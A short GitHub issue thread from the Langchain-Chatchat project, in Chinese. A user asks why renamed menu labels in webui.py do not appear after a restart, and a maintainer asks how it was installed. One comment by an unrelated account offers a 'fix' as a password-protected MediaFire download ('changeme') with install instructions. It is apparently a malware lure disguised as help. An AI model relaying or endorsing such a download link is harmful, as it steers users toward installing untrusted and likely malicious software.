### ISSUE TITLE
修改webui.py，重新启动之后页面没变化

### ISSUE THREAD

**Issue by sallenhandong** [chatchat-space/Langchain-Chatchat#4872]
selected_page = sac.menu(
            [
                sac.MenuItem("多功能对话11", icon="chat"),
                sac.MenuItem("RAG 对话11", icon="database"),
                sac.MenuItem("知识库管理11", icon="hdd-stack"),
            ],
            key="selected_page",
            open_index=0,
        )
    这块代码给标题换个名字，重新启动之后页面没变化，什么原因呢，谢谢

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by imClumsyPanda** [comment]
请问是使用什么方式安装的？

**Comment by sallenhandong** [comment]
> 请问是使用什么方式安装的？

源码方式，不过无所谓了，准备用vue重写一套前端。
